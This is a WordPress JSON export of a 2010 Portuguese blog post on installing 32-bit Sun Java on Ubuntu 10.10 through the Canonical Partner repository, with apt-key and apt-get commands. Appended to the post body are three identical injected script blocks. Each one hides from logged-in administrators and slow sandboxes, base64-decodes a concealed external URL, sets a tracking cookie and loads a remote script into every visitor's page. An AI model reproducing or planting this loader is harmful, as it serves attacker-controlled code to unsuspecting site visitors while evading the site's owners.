{"id":677,"date":"2010-10-20T09:45:35","date_gmt":"2010-10-20T11:45:35","guid":{"rendered":"http:\/\/www.thiagovespa.com.br\/blog\/?p=677"},"modified":"2025-10-26T22:42:34","modified_gmt":"2025-10-27T01:42:34","slug":"instalando-o-java-do-jeito-ubuntu-10-10","status":"publish","type":"post","link":"https:\/\/thiagovespa.com.br\/blog\/2010\/10\/20\/instalando-o-java-do-jeito-ubuntu-10-10\/","title":{"rendered":"Instalando o Java do jeito Ubuntu 10.10"},"content":{"rendered":"<p style=\"text-align: justify;\"><strong>Atualiza\u00e7\u00e3o 01\/06\/2011: <\/strong>Para a vers\u00e3o 11.04 do Ubuntu, <a title=\"Instalando o Java do jeito Ubuntu 11.04\" href=\"http:\/\/www.thiagovespa.com.br\/blog\/2011\/06\/01\/instalando-o-java-do-jeito-ubuntu-11-04\/\" target=\"_blank\" rel=\"noopener\">utilize esse outro post<\/a>.<\/p>\n<p style=\"text-align: justify;\">Ap\u00f3s atualizar o Ubuntu 10.10 Maverick Meerkat fui procurar o Java 32 bits da Sun, ops, Oracle para instalar e para minha surpresa n\u00e3o encontrei o que precisava.<\/p>\n<p style=\"text-align: justify;\">Para instalar \u00e9 necess\u00e1rio habilitar o reposit\u00f3rio de terceiros. Acesse System, Administration, Synaptic Package Manager. Acesse Settings, Repositories, Other Software e Habilite os reposit\u00f3rios do Canonical Partners.<\/p>\n<p style=\"text-align: justify;\">&nbsp;<\/p>\n<figure id=\"attachment_678\" aria-describedby=\"caption-attachment-678\" style=\"width: 300px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/10\/Screenshot-Software-Sources.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-678 \" title=\"Software Sources\" src=\"http:\/\/www.thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/10\/Screenshot-Software-Sources-300x266.png\" alt=\"Software Sources\" width=\"300\" height=\"266\" srcset=\"https:\/\/thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/10\/Screenshot-Software-Sources-300x266.png 300w, https:\/\/thiagovespa.com.br\/blog\/wp-content\/uploads\/2010\/10\/Screenshot-Software-Sources.png 539w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><figcaption id=\"caption-attachment-678\" class=\"wp-caption-text\">Software Sources<\/figcaption><\/figure>\n<p style=\"text-align: justify;\">Clique em Close. Se voc\u00ea tiver o seguinte erro:<\/p>\n<p style=\"text-align: justify;\">&nbsp;<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">Hit http:\/\/archive.canonical.com maverick Release\nHit http:\/\/archive.canonical.com maverick\/partner Sources\nHit http:\/\/archive.canonical.com maverick\/partner amd64 Packages\nFetched 66B in 4s (15B\/s)\nReading package lists... Done\nW: A error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http:\/\/extras.ubuntu.com maverick Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 16126D3A3E5C1192\n\nW: Failed to fetch http:\/\/extras.ubuntu.com\/ubuntu\/dists\/maverick\/Release\n\nW: Some index files failed to download, they have been ignored, or old ones used instead.\n<\/pre>\n<p style=\"text-align: justify;\">Execute o comando;<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\nsudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 16126D3A3E5C1192\nsudo apt-get update\n<\/pre>\n<p style=\"text-align: justify;\">Agora para instalar o JRE 32 bits em uma m\u00e1quina 64 bits (que \u00e9 o que eu quero) \u00e9 s\u00f3 digitar:<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\nsudo apt-get install ia32-sun-java6-bin\n<\/pre>\n<p style=\"text-align: justify;\">Concorde com a licen\u00e7a e o Java ser\u00e1 instalado!<\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0anM=');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Atualiza\u00e7\u00e3o 01\/06\/2011: Para a vers\u00e3o 11.04 do Ubuntu, utilize esse outro post. Ap\u00f3s atualizar o Ubuntu 10.10 Maverick Meerkat fui procurar o Java 32 bits da Sun, ops, Oracle para instalar e para minha surpresa n\u00e3o encontrei o que precisava. <a class=\"more-link\" href=\"https:\/\/thiagovespa.com.br\/blog\/2010\/10\/20\/instalando-o-java-do-jeito-ubuntu-10-10\/\">Continue lendo  <span class=\"screen-reader-text\">  Instalando o Java do jeito Ubuntu 10.10<\/span><span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[3,64],"tags":[],"class_list":["post-677","post","type-post","status-publish","format-standard","hentry","category-java","category-linux"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/posts\/677","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/comments?post=677"}],"version-history":[{"count":0,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/posts\/677\/revisions"}],"wp:attachment":[{"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/media?parent=677"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/categories?post=677"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thiagovespa.com.br\/blog\/wp-json\/wp\/v2\/tags?post=677"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}